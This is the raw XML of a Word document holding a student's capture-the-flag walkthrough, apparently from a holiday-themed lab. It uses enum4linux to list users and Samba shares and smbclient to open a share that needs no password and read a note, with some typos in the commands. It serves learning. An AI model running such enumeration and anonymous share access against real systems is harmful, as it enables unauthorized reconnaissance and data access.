    <w:p w14:paraId="736E3636" w14:textId="4CEC2A7D" w:rsidR="00042848" w:rsidRDefault="00BB68B1">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tbfc-santa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” is the share doesn’t  require a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26DDC5" w14:textId="78E1CE28" w:rsidR="00BB68B1" w:rsidRDefault="00BB68B1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EC8B17E" wp14:editId="72E059F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AEDE07" w14:textId="14887203" w:rsidR="005B76F5" w:rsidRDefault="005B76F5"/>
    <w:p w14:paraId="518A8ACC" w14:textId="4460B5E1" w:rsidR="005B76F5" w:rsidRDefault="005B76F5">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E4A1C" w14:textId="673C6F70" w:rsidR="005B76F5" w:rsidRDefault="005B76F5">
      <w:r>
        <w:t>We type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //IP address/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tbfc-santa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” for log in the account. Next, we type “help” and “ls” to view which files are running. We open a file and get the “note_from_mcskidy.txt” into the file. Lastly, we cat “note_from_mcskidy.txt” and know the directory that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ElfMcSkidy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> leave for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>santa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148C1A9E" w14:textId="398B3E40" w:rsidR="005B76F5" w:rsidRDefault="005B76F5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="278E939C" wp14:editId="3FFF576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DFE0E9" w14:textId="00C42550" w:rsidR="005B76F5" w:rsidRDefault="005B76F5"/>
    <w:p w14:paraId="204F4B09" w14:textId="77777777" w:rsidR="005B76F5" w:rsidRPr="002355FF" w:rsidRDefault="005B76F5" w:rsidP="005B76F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thought Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10FA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AFF4B2" w14:textId="77777777" w:rsidR="00DB04A2" w:rsidRDefault="005B76F5" w:rsidP="00DB04A2">
      <w:r>
        <w:t xml:space="preserve">First, we type “enum4linux -h” in the terminal and get those command. </w:t>
      </w:r>
      <w:r w:rsidR="00DB04A2">
        <w:t>We type “enum4llinux -U IP address” in the terminal and find out how many users are there. We type “enum4linux -S IP address” in the terminal and know how many “share” are there on the Samba server. We know that “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB04A2">
        <w:t>smbc-santa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB04A2">
        <w:t>” is the share doesn’t require a password from the “enum4linux -S IP address”. We type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB04A2">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB04A2">
        <w:t xml:space="preserve"> //IP address/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB04A2">
        <w:t>tbfc-santa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB04A2">
        <w:t xml:space="preserve">” for log in the account. Next, we type “help” and “ls” to view which files are running. We open a file and get the “note_from_mcskidy.txt” into the file. Lastly, we cat “note_from_mcskidy.txt” and know the directory that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB04A2">
        <w:t>ElfMcSkidy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB04A2">
        <w:t xml:space="preserve"> leave for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB04A2">
        <w:t>santa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB04A2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055EF481" w14:textId="7A4B5A4E" w:rsidR="00DB04A2" w:rsidRDefault="00DB04A2" w:rsidP="00DB04A2"/>
    <w:p w14:paraId="74F013FA" w14:textId="26D6ABF7" w:rsidR="005B76F5" w:rsidRDefault="005B76F5" w:rsidP="005B76F5"/>
    <w:p w14:paraId="7FD8194B" w14:textId="393B528F" w:rsidR="005B76F5" w:rsidRPr="005B76F5" w:rsidRDefault="005B76F5"/>
    <w:sectPr w:rsidR="005B76F5" w:rsidRPr="005B7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D1"/>
    <w:rsid w:val="00001EBC"/>
    <w:rsid w:val="0000222F"/>
    <w:rsid w:val="00042848"/>
    <w:rsid w:val="0007236D"/>
    <w:rsid w:val="00103190"/>
    <w:rsid w:val="001941B3"/>
    <w:rsid w:val="002D3A13"/>
    <w:rsid w:val="003718D1"/>
    <w:rsid w:val="00384953"/>
    <w:rsid w:val="004015BA"/>
    <w:rsid w:val="005005DF"/>
    <w:rsid w:val="005B4C87"/>
    <w:rsid w:val="005B76F5"/>
    <w:rsid w:val="007E2759"/>
    <w:rsid w:val="0083492F"/>
    <w:rsid w:val="008672AE"/>
    <w:rsid w:val="008B16C1"/>
    <w:rsid w:val="00900367"/>
    <w:rsid w:val="00907C7E"/>
    <w:rsid w:val="00944E25"/>
    <w:rsid w:val="00A554D6"/>
    <w:rsid w:val="00A96B85"/>
    <w:rsid w:val="00AA5C9A"/>
    <w:rsid w:val="00AA728B"/>
    <w:rsid w:val="00BB68B1"/>
    <w:rsid w:val="00BD0B76"/>
    <w:rsid w:val="00BD5223"/>
    <w:rsid w:val="00BE662B"/>
    <w:rsid w:val="00C13ADD"/>
    <w:rsid w:val="00C775D1"/>
    <w:rsid w:val="00C87DCE"/>
    <w:rsid w:val="00D113E6"/>
    <w:rsid w:val="00DB04A2"/>
    <w:rsid w:val="00DF4AA6"/>
    <w:rsid w:val="00ED4BF0"/>
    <w:rsid w:val="00ED5324"/>
    <w:rsid w:val="00FC4E75"/>
    <w:rsid w:val="00FE72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622D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{50A0A3EE-3DA9-4A20-925D-E85F6636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A6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF4AA6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA5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OWASP/CheatSheetSeries/blob/master/cheatsheets/Input_Validation_Cheat_Sheet.md"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OWASP/CheatSheetSerie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OWASP/CheatSheetSeries/blob/master/cheatsheets/Input_Validation_Cheat_Sheet.md"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github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Input_Validation_Cheat_Sheet.md"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123C118537045833853467E62BE68" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="87b9bdb43ca0e1dfa982e06dd4d802a3">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="04e5874c-213b-4139-820f-d268cffac56c" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="fbfcd98ef416cac658166357b172cb69" ns3:_="">
    <xsd:import namespace="04e5874c-213b-4139-820f-d268cffac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874c-213b-4139-820f-d268cffa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342D-5319-4BFB-AB0E-A127C1A3E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C4601-545A-44BF-81D8-694C28F5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874c-213b-4139-820f-d268cffac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1D32B-42D6-4F65-93CC-544A2886BB05}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D4BD0F73-3F5A-4947-8872-78E5D6D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CHUN KIT</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>LEONG CHUN KIT</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-25T15:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-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23C118537045833853467E62BE68</vt:lpwstr>
  </property>
</Properties>
</file>